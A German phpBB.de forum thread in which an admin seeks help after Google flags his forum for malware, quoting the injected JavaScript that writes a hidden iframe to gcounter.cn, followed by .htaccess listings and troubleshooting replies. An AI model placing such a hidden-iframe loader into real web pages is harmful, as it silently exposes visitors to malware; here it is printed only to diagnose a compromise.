phpBB.de

Verfasst: **06.07.2010 16:50**

Hallo zusammen

Habe momentan das Problem das alle User welche mit Safari und Firefox Browser in meinem Forum unterwegs sind seit zwei Tagen wegen einer Malware Warnung ausgesperrt werden. IE in der aktuellsten Version jedoch kein Problem.
Habe bereits nach etwas ähnlichem für phpbb3 hier im Forum gesucht, jedoch noch nichts gefunden.

Da ich die Webmaster Tools von Google verwende konnte ich das Problem lokalisieren. Seit zwei Tagen warnt Google in verschiedenen Threads des Forums wegen solchen Scripts:

Code: Alles auswählen

<script language="JavaScript" type="text/javascript"> 
if (document.cookie.search("zvbo=7") == -1) {
hkf=document.getElementById('jtj');if(hkf==null){document.write('<iframe id=jtj src=http://gcounter.cn style=display:none></iframe>');}
document.cookie = "zvbo=7;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
</script>

Er bezieht sich hier auf den versteckten Link zu gcounter.cn, jedoch habe ich keine Ahnung wo ich, oder besser gesagt in welcher Datei ich nach dem Script suchen muss um das ganze zu Bereinigen.

Momentan werden diverse Beiträge mittels viewtopic.php, dem phpBB3 Root Verzeichnis, oder der portal.php von den Google Webmaster Tools als verseucht gemeldet.

Momentan verwende ich die aktuellste Version von phpBB3 3.0.7-PL1 und dem Board3 Portal 1.0.5, das Forum läuft auf einen Hostingserver, also nicht auf meinem eigenen.

Vielen Dank für eure Hilfe

Verfasst: **06.07.2010 17:08**

Gibt es denn einen Link zu deinem Forum???

Verfasst: **06.07.2010 17:18**

Sorry

http://www.fischerforum.ch/phpBB3/

Das von Google:

Sehr geehrter Inhaber oder Webmaster von http://fischerforum.ch/,

Wir haben kürzlich festgestellt, dass durch einige Ihrer Seiten auf den Computern von Nutzern bösartige Software installiert wird. Nutzern wird derzeit eine Warnmeldung angezeigt, wenn sie die betreffenden Seiten durch Klicken auf ein Suchergebnis bei Google aufrufen.

Im Folgenden werden Beispiel-URLs Ihrer Website angegeben, durch die die Computer von Nutzern infiziert werden können:

http://fischerforum.ch/phpBB3/
http://www.fischerforum.ch/phpBB3/
http://www.fischerforum.ch/phpBB3/portal.php

Klicken Sie auf folgenden Link, um ein Beispiel für eine Seite mit einer Warnmeldung anzuzeigen: http://www.google.com/interstitial?url= ... ch/phpBB3/.

Wir empfehlen Ihnen, zum Schutz Ihrer Nutzer diese Angelegenheit umgehend zu prüfen. Obwohl auf einigen Websites bösartige Software absichtlich verbreitet wird, ist der Webmaster in vielen Fällen darüber nicht informiert. Mögliche Gründe:

1) Die Website wurde manipuliert.

2) Die Website wird nicht auf bösartigen Content von Nutzern überprüft.

3) Auf der Website werden Inhalte eines Werbenetzwerks angezeigt, das einen bösartigen Werbekunden umfasst.

Wurde Ihre Website manipuliert, muss nicht nur der bösartige und in der Regel verborgene Content von Ihren Seiten entfernt werden. Zudem muss die Schwachstelle ermittelt und behoben werden. Wenden Sie sich an den Hostanbieter, wenn Sie sich bezüglich der Vorgehensweise nicht sicher sind. StopBadware bietet außerdem eine Seite mit Ressourcen zum Sichern manipulierter Websites: http://www.stopbadware.org/home/security.

Nach dem Sichern Ihrer Website können Sie beantragen, dass die Warnmeldung entfernt wird. Rufen Sie dazu den hier bereitgestellten Artikel der Webmaster-Hilfe auf und fordern Sie eine Überprüfung an. Ist Ihre Website für Nutzer nicht mehr gefährlich, wird die Warnmeldung entfernt.

Mit freundlichen Grüßen

Google-Team für die Suchqualität

1600 Amphitheatre Parkway

Mountain View CA 94043

Sie erhalten diese E-Mail, da Sie ein bestätigter Inhaber dieser Website in Google Webmaster-Tools sind. Wenn Sie diese Art von Benachrichtigungen für diese Website nicht mehr erhalten möchten, entfernen Sie sich in der Webmaster-Tools-Konsole selbst als bestätigter Websiteinhaber.

Verfasst: **06.07.2010 17:48**

Ich hege die Behauptung das Dein Webspace gehackt wurde.
Sieht nach einem rewrite Rule aus, denn alles was mit dem Forum zutun hat wird nicht über eine manuelle Eingabe sichtbar.
--- mal per FTP die dortige .htaccess (im Forumpfad) herunterladen und mit einem Editor öffnen ob da umleitungs Regeln eingebaut sind.---

Auch selbst bei abgeschaltetem Java erscheint die Warn-Seite und auch bei dem explizitem "Ignorieren" erscheint eine Webseite die das Warnsystem als Umfrage beantwortet haben möchten, was schon mal gar nicht geht.

Verfasst: **06.07.2010 18:00**

Inhalt der .htaccess vom phpBB3 Root Verzeichnis

Code: Alles auswählen

#
# Uncomment the statement below if you want to make use of
# HTTP authentication and it does not already work.
# This could be required if you are for example using PHP via Apache CGI.
#
#<IfModule mod_rewrite.c>
#RewriteEngine on
#RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#</IfModule>

<Files "config.php">
Order Allow,Deny
Deny from All
</Files>

<Files "common.php">
Order Allow,Deny
Deny from All
</Files>

DirectoryIndex portal.php index.php index.html index.htm

Sorry bin Laie, kannst du damit was anfangen?

Verfasst: **06.07.2010 19:04**

Da ist nichts bösartiges drin ...

Verfasst: **06.07.2010 19:17**

macht mich stutzig, da das ganze erst ab dem unterpfad passiert.

schau mal zur gegenprobe auch mal im obersten pfad nach (also da wo das Menü im Iframe aufgebaut wird mit der hauptseite (die bilder)
ob da noch eine .htaccess vorhanden ist.

Oder....und das wäre der absolute hammer.... der Hoster schaltet über deren DNS-Request auf dieses Warn-dingens. Aber dann wäre das ein nicht ganz koscher Hoster.

Verfasst: **06.07.2010 19:24**

Also Gemäss Google Webtools sollten unter folgenden URLs meines Forums solche scripts vorhanden sein. Ein paar wenige URLs sind von heute und sind bisher auch die einzigsten, der Rest ist vom 5.7.2010.

Gucke gleich mal nach ob ich noch mehrere .htaccess habe

/phpBB3/
/phpBB3/portal.php
/phpBB3/viewtopic.php?f=11&t=2692
/phpBB3/viewtopic.php?f=16&t=10734
/phpBB3/viewtopic.php?f=16&t=11064
/phpBB3/viewtopic.php?f=16&t=11188
/phpBB3/viewtopic.php?f=16&t=11188&p=150694
/phpBB3/viewtopic.php?f=16&t=5887
/phpBB3/viewtopic.php?f=16&t=7779
/phpBB3/viewtopic.php?f=16&t=8837&start=0
/phpBB3/viewtopic.php?f=17&t=11180&p=150698
/phpBB3/viewtopic.php?f=17&t=5574
/phpBB3/viewtopic.php?f=17&t=698
/phpBB3/viewtopic.php?f=18&t=3424&start=15
/phpBB3/viewtopic.php?f=18&t=8726
/phpBB3/viewtopic.php?f=19&t=3427&start=15
/phpBB3/viewtopic.php?f=19&t=3742
/phpBB3/viewtopic.php?f=19&t=5258&start=0
/phpBB3/viewtopic.php?f=19&t=8838
/phpBB3/viewtopic.php?f=20&t=6340
/phpBB3/viewtopic.php?f=23&t=74
/phpBB3/viewtopic.php?f=27&t=11167
/phpBB3/viewtopic.php?f=30&t=6162
/phpBB3/viewtopic.php?f=30&t=7517
/phpBB3/viewtopic.php?f=35&t=6613
/phpBB3/viewtopic.php?f=36&t=11011&start=0 Details 06.07.10
/phpBB3/viewtopic.php?f=36&t=11186&p=150695
/phpBB3/viewtopic.php?f=36&t=6642
/phpBB3/viewtopic.php?f=38&t=9553
/phpBB3/viewtopic.php?f=4&t=10108&start=0
/phpBB3/viewtopic.php?f=4&t=10455
/phpBB3/viewtopic.php?f=4&t=10463&p=143004
/phpBB3/viewtopic.php?f=4&t=10983&p=148865
/phpBB3/viewtopic.php?f=4&t=28
/phpBB3/viewtopic.php?f=4&t=4520&start=0
/phpBB3/viewtopic.php?f=4&t=4850&p=69736
/phpBB3/viewtopic.php?f=4&t=5276&start=15
/phpBB3/viewtopic.php?f=4&t=6
/phpBB3/viewtopic.php?f=4&t=6462&start=0
/phpBB3/viewtopic.php?f=4&t=6874&start=15
/phpBB3/viewtopic.php?f=4&t=8037
/phpBB3/viewtopic.php?f=4&t=9204
/phpBB3/viewtopic.php?f=41&t=7473&start=15
/phpBB3/viewtopic.php?f=41&t=8444&p=150684
/phpBB3/viewtopic.php?f=43&t=10908&p=150686
/phpBB3/viewtopic.php?f=6&t=10623&p=150699
/phpBB3/viewtopic.php?f=61&t=11024&p=150150 Details 06.07.10
/phpBB3/viewtopic.php?f=7&t=10029&p=149502
/phpBB3/viewtopic.php?f=73&t=9123
/phpBB3/viewtopic.php?f=8&t=9260
/phpBB3/viewtopic.php?f=82&t=4248 Details 06.07.10
/phpBB3/viewtopic.php?f=29&t=6271 Details 06.07.10

Verfasst: **06.07.2010 19:31**

Du hast mehrere .htaccess, darum geht es aber nicht.

Ein .htaccess greift ab dem Pfad wo er abgelegt wurd und von da ab auf alle unterpfade.
Da aber wohl (durch Deine Code Einblendung sichtbar) die .htaccess im phpBB3 Pfad in Ordnung ist, käme meine zweite Anmerkung dazu zum tragen.

Ich hab mir Deinen Aufbau des Webspaces nicht abgescannt und angeschaut wie alles bei Dir definiert wurde und woher Dein Content überhaupt sich zusammensetzt. Ich sah nur auf der hauptdomain die Bildersache die einen IFrame hat mit dem Menü.

Verfasst: **06.07.2010 19:37**

Also möchtest du den Inhalt des Webhost Roots wo die Page liegt, demnach unter /httpdocs/.htaccess ???

Ich poste den Inhalt mal gleich:

Code: Alles auswählen

# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
AuthName ********.**
AuthUserFile /home/httpd/vhosts/fischerforum.ch/httpdocs/*****/*****.pwd
AuthGroupFile /home/httpd/vhosts/fischerforum.ch/httpdocs/*****/*****.grp

phpBB.de

Firefox / Safari sperrt User aus (iFrame Problem)

Firefox / Safari sperrt User aus (iFrame Problem)

Re: Firefox / Safari sperrt User aus (iFrame Problem)

Re: Firefox / Safari sperrt User aus (iFrame Problem)

Re: Firefox / Safari sperrt User aus (iFrame Problem)

Re: Firefox / Safari sperrt User aus (iFrame Problem)

Re: Firefox / Safari sperrt User aus (iFrame Problem)

Re: Firefox / Safari sperrt User aus (iFrame Problem)

Re: Firefox / Safari sperrt User aus (iFrame Problem)

Re: Firefox / Safari sperrt User aus (iFrame Problem)

Re: Firefox / Safari sperrt User aus (iFrame Problem)